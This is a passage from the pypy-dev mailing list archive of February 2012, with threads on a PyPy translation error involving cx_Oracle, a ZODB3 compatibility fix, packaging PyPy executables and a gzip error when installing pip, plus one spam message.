> > '(pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook' > > [translation:ERROR] Processing block: > > [translation:ERROR] block at 226 is a > 'pypy.objspace.flow.flowcontext.SpamBlock'> > > [translation:ERROR] in > > (pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook > > [translation:ERROR] containing the following operations: > > [translation:ERROR] v2309 = simple_call(v2301, v2302, v2303, > v2304, > > v2305, v2306, v2307, v2308) > > [translation:ERROR] --end-- > > _______________________________________________ > > pypy-dev mailing list > > pypy-dev at python.org > > http://mail.python.org/mailman/listinfo/pypy-dev > > > > Hi Philip. > > This is a bit problematic without installing oracle. Can you run this > again and while in pdb say what s_oldarg and s_newarg is? > -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Mon Feb 27 19:12:46 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 27 Feb 2012 10:12:46 -0800 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: On Mon, Feb 27, 2012 at 9:39 AM, Phillip Class wrote: > Hi Maciej, > > In Pdb they look like this: > > [translation] start debugger... >> >> /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() > -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg > (Pdb+) s_oldarg > SomeInstance(can_be_None=False, > classdef=pypy.objspace.std.intobject.W_IntObject) > (Pdb+) s_newarg > SomeInstance(can_be_None=False, > classdef=pypy.objspace.std.stringobject.W_StringObject) This is so obscure..... Temporarily you can go and disable those functions by going to pypy/module/pypyjit/__init__.py and commenting out 3 lines with set_compile_hook, set_optimize_hook and set_abort_hook. I'm looking into the actual solution in the meantime. 
Cheers, fijal From fijall at gmail.com Mon Feb 27 20:07:06 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 27 Feb 2012 11:07:06 -0800 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: On Mon, Feb 27, 2012 at 10:12 AM, Maciej Fijalkowski wrote: > On Mon, Feb 27, 2012 at 9:39 AM, Phillip Class > wrote: >> Hi Maciej, >> >> In Pdb they look like this: >> >> [translation] start debugger... >>> >>> /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() >> -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg >> (Pdb+) s_oldarg >> SomeInstance(can_be_None=False, >> classdef=pypy.objspace.std.intobject.W_IntObject) >> (Pdb+) s_newarg >> SomeInstance(can_be_None=False, >> classdef=pypy.objspace.std.stringobject.W_StringObject) > > This is so obscure..... > > Temporarily you can go and disable those functions by going to > pypy/module/pypyjit/__init__.py and commenting out 3 lines with > set_compile_hook, set_optimize_hook and set_abort_hook. I'm looking > into the actual solution in the meantime. > > Cheers, > fijal Hi Philip Can you paste the entire output somewhere? From phillip.d.class at gmail.com Mon Feb 27 20:16:04 2012 From: phillip.d.class at gmail.com (Phillip Class) Date: Mon, 27 Feb 2012 19:16:04 +0000 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: Hi Maciej, It's very big but here is the entire thing: http://pastebin.com/MkmHPBAU Thanks, Phil On Mon, Feb 27, 2012 at 7:07 PM, Maciej Fijalkowski wrote: > On Mon, Feb 27, 2012 at 10:12 AM, Maciej Fijalkowski > wrote: > > On Mon, Feb 27, 2012 at 9:39 AM, Phillip Class > > wrote: > >> Hi Maciej, > >> > >> In Pdb they look like this: > >> > >> [translation] start debugger... 
> >>> > >>> > /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() > >> -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg > >> (Pdb+) s_oldarg > >> SomeInstance(can_be_None=False, > >> classdef=pypy.objspace.std.intobject.W_IntObject) > >> (Pdb+) s_newarg > >> SomeInstance(can_be_None=False, > >> classdef=pypy.objspace.std.stringobject.W_StringObject) > > > > This is so obscure..... > > > > Temporarily you can go and disable those functions by going to > > pypy/module/pypyjit/__init__.py and commenting out 3 lines with > > set_compile_hook, set_optimize_hook and set_abort_hook. I'm looking > > into the actual solution in the meantime. > > > > Cheers, > > fijal > > Hi Philip > > Can you paste the entire output somewhere? > -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Mon Feb 27 20:18:27 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 27 Feb 2012 11:18:27 -0800 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: On Mon, Feb 27, 2012 at 11:16 AM, Phillip Class wrote: > Hi Maciej, > > It's very big but here is the entire thing: > http://pastebin.com/MkmHPBAU > > Thanks, > > Phil On the unrelated note, you might want to install libbz2 and ncurses ;-) > > > On Mon, Feb 27, 2012 at 7:07 PM, Maciej Fijalkowski > wrote: >> >> On Mon, Feb 27, 2012 at 10:12 AM, Maciej Fijalkowski >> wrote: >> > On Mon, Feb 27, 2012 at 9:39 AM, Phillip Class >> > wrote: >> >> Hi Maciej, >> >> >> >> In Pdb they look like this: >> >> >> >> [translation] start debugger... 
>> >>> >> >>> >> >>> /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() >> >> -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg >> >> (Pdb+) s_oldarg >> >> SomeInstance(can_be_None=False, >> >> classdef=pypy.objspace.std.intobject.W_IntObject) >> >> (Pdb+) s_newarg >> >> SomeInstance(can_be_None=False, >> >> classdef=pypy.objspace.std.stringobject.W_StringObject) >> > >> > This is so obscure..... >> > >> > Temporarily you can go and disable those functions by going to >> > pypy/module/pypyjit/__init__.py and commenting out 3 lines with >> > set_compile_hook, set_optimize_hook and set_abort_hook. I'm looking >> > into the actual solution in the meantime. >> > >> > Cheers, >> > fijal >> >> Hi Philip >> >> Can you paste the entire output somewhere? > > From arigo at tunes.org Tue Feb 28 09:13:21 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 28 Feb 2012 09:13:21 +0100 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: Hi, On Mon, Feb 27, 2012 at 18:39, Phillip Class wrote: >> /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() > -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg > (Pdb+) s_oldarg > SomeInstance(can_be_None=False, > classdef=pypy.objspace.std.intobject.W_IntObject) > (Pdb+) s_newarg > SomeInstance(can_be_None=False, > classdef=pypy.objspace.std.stringobject.W_StringObject) Ah, I see why. It's some random argument to space.call_function(cache.w_compile_hook, <6 arguments>). It turns out that in module/oracle/transform.py there is also another call to space.call_function() with 7 arguments. The two conflict because they are not annotated at the same time. I can write a test, probably. 
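[The failing assertion from the pdb session can be mimicked with a toy model — purely illustrative, using plain Python types in place of the annotator's SomeInstance objects and a made-up `unionof`, not PyPy's real rpython machinery — of how a second call site with a differently-typed argument forces an already-settled annotation to widen:]

```python
# Toy stand-in for annmodel.unionof (illustrative only): widen two
# annotations to their common supertype.
def unionof(s_a, s_b):
    return s_a if s_a is s_b else object

s_oldarg = int  # position first annotated from a W_IntObject call site
s_newarg = str  # the oracle module's call site supplies a string here

# Mirrors "assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg":
# the union is object, not int, so the annotation is not stable and
# the annotator's assertion fails.
if unionof(s_oldarg, s_newarg) is not s_oldarg:
    print("annotation conflict: int position would widen to object")
```

In the real translator the two conflicting call sites are the 6-argument and 7-argument `space.call_function()` calls Armin identifies above.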
Armin

From asouzaleite at gmx.de  Tue Feb 28 10:09:43 2012
From: asouzaleite at gmx.de (Aroldo Souza-Leite)
Date: Tue, 28 Feb 2012 10:09:43 +0100
Subject: [pypy-dev] ZODB3
In-Reply-To: References: <4F4B5296.6050903@gmx.de>
Message-ID: <4F4C99D7.3050407@gmx.de>

Hi Armin, hi Maciej, hi list,

thanks, I'll try and take the issue to the zodb-dev at zope.org.

Cheers.

Aroldo.

On 27.02.2012 16:48, Armin Rigo wrote:
> Hi,
>
> On Mon, Feb 27, 2012 at 16:29, Maciej Fijalkowski wrote:
>> On PyPy it probably should not do anything so you can maybe try with
>> #define _Py_ForgetReference(obj), but I don't actually know.
> Yes, it looks like it doesn't do anything in release builds of
> CPython. It's there for debugging.
>
>
> A bientôt,
>
> Armin.

From arigo at tunes.org  Tue Feb 28 10:42:10 2012
From: arigo at tunes.org (Armin Rigo)
Date: Tue, 28 Feb 2012 10:42:10 +0100
Subject: [pypy-dev] ZODB3
In-Reply-To: <4F4C99D7.3050407@gmx.de>
References: <4F4B5296.6050903@gmx.de> <4F4C99D7.3050407@gmx.de>
Message-ID:

Hi,

On Tue, Feb 28, 2012 at 10:09, Aroldo Souza-Leite wrote:
> thanks, I'll try and take the issue to the zodb-dev at zope.org.

Ah, that's not what I meant. I meant that we can just add a
do-nothing _Py_ForgetReference in PyPy and be done.

A bientôt,

Armin.

From asouzaleite at gmx.de  Tue Feb 28 10:55:47 2012
From: asouzaleite at gmx.de (Aroldo Souza-Leite)
Date: Tue, 28 Feb 2012 10:55:47 +0100
Subject: [pypy-dev] ZODB3
In-Reply-To: References: <4F4B5296.6050903@gmx.de> <4F4C99D7.3050407@gmx.de>
Message-ID: <4F4CA4A3.40100@gmx.de>

Hi,

On 28.02.2012 10:42, Armin Rigo wrote:
> Hi,
>
> On Tue, Feb 28, 2012 at 10:09, Aroldo Souza-Leite wrote:
>> thanks, I'll try and take the issue to the zodb-dev at zope.org.
> Ah, that's not what I meant. I meant that we can just add a
> do-nothing _Py_ForgetReference in PyPy and be done.
>
>
> A bientôt,
>
> Armin.

Oh, does that mean that this problem could be solved by the PyPy people?

Cheers.

Aroldo.
From arigo at tunes.org  Tue Feb 28 13:44:45 2012
From: arigo at tunes.org (Armin Rigo)
Date: Tue, 28 Feb 2012 13:44:45 +0100
Subject: [pypy-dev] ZODB3
In-Reply-To: <4F4CA4A3.40100@gmx.de>
References: <4F4B5296.6050903@gmx.de> <4F4C99D7.3050407@gmx.de> <4F4CA4A3.40100@gmx.de>
Message-ID:

Hi,

On Tue, Feb 28, 2012 at 10:55, Aroldo Souza-Leite wrote:
> Oh, does that mean that this problem could be solved by the PyPy people?

Yes. Fixed in b741ab752493. The easiest is to wait for next night's
automatic builds, but you can also try it out directly by replacing the
file Include/object.h with the latest version of
https://bitbucket.org/pypy/pypy/raw/default/pypy/module/cpyext/include/object.h .

A bientôt,

Armin.

From pa.basso at gmail.com  Wed Feb 29 09:57:51 2012
From: pa.basso at gmail.com (Paolo Basso)
Date: Wed, 29 Feb 2012 09:57:51 +0100
Subject: [pypy-dev] pypy2exe
Message-ID:

Perhaps this will sound like a newbie question, but IMHO a lot of people
would benefit from some clarification and more info.

Here's the point: what if I want to build an executable using pypy
(possibly with a GUI)? I'm not a pro of course, but with cpython I'm able
to do it quite easily thanks to py2exe and many GUI frameworks (Qt also
comes with a designer). Is there, or will there be, something like a
pypy2exe, or is there a step-by-step guide I missed? Might rpythonic
(http://code.google.com/p/rpythonic/) be useful?

I apologize if this is the wrong place to discuss such a topic, I can
post the question in a better context if you redirect me...

Cheers,
Paolo
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From affleck.m at gmail.com  Wed Feb 29 18:15:44 2012
From: affleck.m at gmail.com (Affleck, Melanie)
Date: Wed, 29 Feb 2012 18:15:44 +0100
Subject: [pypy-dev] web_review
Message-ID: <36256051.20120229181544@gmail.com>

Dear Pypy-dev,

We will review your site and your web placement, at no-cost to you, now.
Reply today for your complimentary analysis.
Sincerely, Melanie Affleck Interplay_Marketing pypy-dev at codespeak.net 2/29/2012 From asouzaleite at gmx.de Wed Feb 29 18:56:01 2012 From: asouzaleite at gmx.de (Aroldo Souza-Leite) Date: Wed, 29 Feb 2012 18:56:01 +0100 Subject: [pypy-dev] pip In-Reply-To: <36256051.20120229181544@gmail.com> References: <36256051.20120229181544@gmail.com> Message-ID: <4F4E66B1.8020205@gmx.de> Hi list, I'm getting an error when trying to easy_install pip in PyPy (nightly build). The error doesn't occur in PyPy-1.8. Thanks. Aroldo. ------- (pypy)root at aroldo-laptop:/opt/pypy/bin# which python /opt/pypy//bin/python (pypy)root at aroldo-laptop:/opt/pypy/bin# which easy_install /opt/pypy//bin/easy_install (pypy)root at aroldo-laptop:/opt/pypy/bin# easy_install pip ... Adding pip 1.1 to easy-install.pth file Installing pip script to /opt/pypy/bin Installing pip-2.7 script to /opt/pypy/bin Installed /opt/pypy-c-jit-53000-836fcc2fe8d8-linux/site-packages/pip-1.1-py2.7. egg Processing dependencies for pip Finished processing dependencies for pip Traceback (most recent call last): File "app_main.py", line 51, in run_toplevel File "/opt/pypy/lib-python/2.7/gzip.py", line 371, in flush self._check_closed() File "/opt/pypy/lib-python/2.7/gzip.py", line 146, in _check_closed raise ValueError('I/O operation on closed file.') ValueError: I/O operation on closed file. (pypy)root at aroldo-laptop:/opt/pypy/bin# From alex.gaynor at gmail.com Wed Feb 29 18:59:39 2012 From: alex.gaynor at gmail.com (Alex Gaynor) Date: Wed, 29 Feb 2012 12:59:39 -0500 Subject: [pypy-dev] pip In-Reply-To: <4F4E66B1.8020205@gmx.de> References: <36256051.20120229181544@gmail.com> <4F4E66B1.8020205@gmx.de> Message-ID: On Wed, Feb 29, 2012 at 12:56 PM, Aroldo Souza-Leite wrote: > Hi list, > > I'm getting an error when trying to easy_install pip in PyPy (nightly > build). The error doesn't occur in PyPy-1.8. > > Thanks. > > Aroldo. 
>
> -------
>
> (pypy)root at aroldo-laptop:/opt/pypy/bin# which python
> /opt/pypy//bin/python
> (pypy)root at aroldo-laptop:/opt/pypy/bin# which easy_install
> /opt/pypy//bin/easy_install
>
> (pypy)root at aroldo-laptop:/opt/pypy/bin# easy_install pip
> ...
> Adding pip 1.1 to easy-install.pth file
> Installing pip script to /opt/pypy/bin
> Installing pip-2.7 script to /opt/pypy/bin
>
> Installed /opt/pypy-c-jit-53000-836fcc2fe8d8-linux/site-packages/pip-1.1-py2.7.egg
> Processing dependencies for pip
> Finished processing dependencies for pip
> Traceback (most recent call last):
>   File "app_main.py", line 51, in run_toplevel
>   File "/opt/pypy/lib-python/2.7/gzip.py", line 371, in flush
>     self._check_closed()
>   File "/opt/pypy/lib-python/2.7/gzip.py", line 146, in _check_closed
>     raise ValueError('I/O operation on closed file.')
> ValueError: I/O operation on closed file.
> (pypy)root at aroldo-laptop:/opt/pypy/bin#
> _______________________________________________
> pypy-dev mailing list
> pypy-dev at python.org
> http://mail.python.org/mailman/listinfo/pypy-dev

I ran into this recently and just ignored it; it seemed to work OK.
However, I'm guessing it's a result of d4dee87e47cc.

Alex

--
"I disapprove of what you say, but I will defend to the death your right
to say it." -- Evelyn Beatrice Hall (summarizing Voltaire)
"The people's good is the highest law." -- Cicero
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From anto.cuni at gmail.com  Wed Feb 29 23:01:46 2012
From: anto.cuni at gmail.com (Antonio Cuni)
Date: Wed, 29 Feb 2012 23:01:46 +0100
Subject: [pypy-dev] pip
In-Reply-To: References: <36256051.20120229181544@gmail.com> <4F4E66B1.8020205@gmx.de>
Message-ID: <4F4EA04A.1040000@gmail.com>

On 02/29/2012 06:59 PM, Alex Gaynor wrote:
> I ran into this recently and just ignored it, it seemed to work ok. However,
> I'm guessing it's a result of d4dee87e47cc.
It's probably because of the autoflush. It should be fixed by
f9f3b57f1300, which I just pushed, so tomorrow's nightly should already
work well.

ciao,
anto
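[The gzip traceback in this thread boils down to flushing a GzipFile that is already closed. A minimal, self-contained reproduction — an editorial sketch written against the modern stdlib, not PyPy's app_main.py shutdown path — is:]

```python
import gzip
import io

# Build a gzip stream in memory, close it, then flush it again --
# roughly what an automatic flush at interpreter shutdown did here.
buf = io.BytesIO()
f = gzip.GzipFile(fileobj=buf, mode="wb")
f.write(b"data")
f.close()

try:
    f.flush()  # flushing after close raises ValueError
except ValueError as e:
    print("ValueError:", e)
```

The fix referenced above avoids triggering that flush on already-closed files rather than changing gzip itself.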